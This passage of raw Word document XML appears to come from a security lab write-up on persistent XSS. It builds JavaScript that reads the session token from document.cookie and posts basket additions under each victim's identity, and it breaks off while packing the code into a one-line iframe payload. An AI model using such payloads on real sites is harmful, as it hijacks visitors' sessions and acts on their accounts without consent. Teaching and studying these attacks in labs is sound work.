      <w:r w:rsidR="000516C9">
        <w:t xml:space="preserve">n item to the basket of the user with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000516C9">
        <w:t>UserID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000516C9">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00247E7D">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000516C9">
        <w:t xml:space="preserve"> (User IDs match up to Basket IDs)</w:t>
      </w:r>
      <w:r w:rsidR="00D968DC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2842E656" w14:textId="298B2D09" w:rsidR="002924DF" w:rsidRDefault="002924DF" w:rsidP="00E35378">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E21D323" w14:textId="039DE64B" w:rsidR="00B126A7" w:rsidRDefault="002924DF" w:rsidP="002924DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now we should look at replicating this process within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DC62E4">
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t>avascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006D19F1">
        <w:t>The following code, adapted from [</w:t>
      </w:r>
      <w:r w:rsidR="003E0CC5">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="006D19F1">
        <w:t xml:space="preserve">], sends a POST request using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D19F1">
        <w:t>Javascript’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D19F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D19F1">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D19F1">
        <w:t xml:space="preserve"> class (also known as XHR), with </w:t>
      </w:r>
      <w:r w:rsidR="00B126A7">
        <w:t>a JSON as a parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F3413B" w14:textId="2CB8AAA6" w:rsidR="00B126A7" w:rsidRDefault="00B126A7" w:rsidP="002924DF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD4BA85"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//create XML HTTP Request (XHR) object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28042ED9"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">var http = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43860CF4" w14:textId="77777777" w:rsidR="003F61BF" w:rsidRPr="00C0732F" w:rsidRDefault="003F61BF" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08ABC97B"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//set URL + open a POST request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415D292F"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 xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BasketItems</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E01BE13" w14:textId="77777777" w:rsidR="003F61BF" w:rsidRPr="00C0732F" w:rsidRDefault="003F61BF" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">('POST', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E5BC1E" w14:textId="77777777" w:rsidR="003F61BF" w:rsidRPr="00C0732F" w:rsidRDefault="003F61BF" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F6E7CDF"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//get the current cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB97D21"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 xml:space="preserve">var cookie = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73026095" w14:textId="77777777" w:rsidR="003F61BF" w:rsidRPr="00C0732F" w:rsidRDefault="003F61BF" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D402F3D"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//parse the token from the cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6260FB6B"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 xml:space="preserve">var token = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cookie.substring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cookie.indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('token=') + 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9A23EB" w14:textId="77777777" w:rsidR="003F61BF" w:rsidRPr="00C0732F" w:rsidRDefault="003F61BF" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D60C55D"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//set the request type (unrelated to the exploit, but necessary for telling the server how to handle the request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64805634" w14:textId="77777777" w:rsidR="003F61BF" w:rsidRPr="00C0732F" w:rsidRDefault="003F61BF" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('Content-Type', 'application/json');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A77E56E" w14:textId="77777777" w:rsidR="003F61BF" w:rsidRPr="00C0732F" w:rsidRDefault="003F61BF" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A96CF3"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//set the authorisation header - important! tells the server we're logged in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C584C4" w14:textId="77777777" w:rsidR="003F61BF" w:rsidRPr="00C0732F" w:rsidRDefault="003F61BF" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>('Authorization', 'Bearer ' + token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E83088D" w14:textId="77777777" w:rsidR="003F61BF" w:rsidRPr="00C0732F" w:rsidRDefault="003F61BF" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33EBEFA7" w14:textId="77777777" w:rsidR="003F61BF" w:rsidRPr="00C0732F" w:rsidRDefault="003F61BF" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">//send a request to buy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ProductID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D09696" w14:textId="04E5DF53" w:rsidR="003A1990" w:rsidRPr="00C0732F" w:rsidRDefault="003F61BF" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JSON.stringify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>({'ProductId':2, 'BasketId':'1', 'quantity':1}));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B52608" w14:textId="1BEEF675" w:rsidR="00EE3814" w:rsidRDefault="00EE3814" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB03505" w14:textId="6A3F7D8B" w:rsidR="003472CE" w:rsidRDefault="003472CE" w:rsidP="003F61BF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Most importantly, we grab the token of the currently logged in user and use this to authorise ourselves – this means that, unfortunately, we can only add items to the basket of the current user – but using persistent XSS, we can get any user that stumbles upon our compromised page to send this request!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355C0A68" w14:textId="675B7234" w:rsidR="00012E08" w:rsidRDefault="00012E08" w:rsidP="00012E08">
      <w:r>
        <w:t xml:space="preserve">We now want to squeeze all of this into one line so we can include it as part of an </w:t>
      </w:r>
      <w:r w:rsidRPr="00A409EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tag – </w:t>
      </w:r>
      <w:r w:rsidR="00181844">
        <w:t xml:space="preserve">remember to </w:t>
      </w:r>
      <w:r w:rsidR="003209A3">
        <w:t xml:space="preserve">only use single quotes within the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003209A3" w:rsidRPr="001D68B1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003209A3" w:rsidRPr="001D68B1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003209A3">
        <w:t>variable! T</w:t>
      </w:r>
      <w:r>
        <w:t>his looks like the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684D6DF4" w14:textId="307068FF" w:rsidR="00012E08" w:rsidRPr="00C0732F" w:rsidRDefault="00E13B46" w:rsidP="00950BE7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>javascript:var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(); var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BasketItems</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">('POST', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">); var cookie = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">; var token = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cookie.substring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cookie.indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">('token=') + 6); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C0732F">
        <w:rPr>
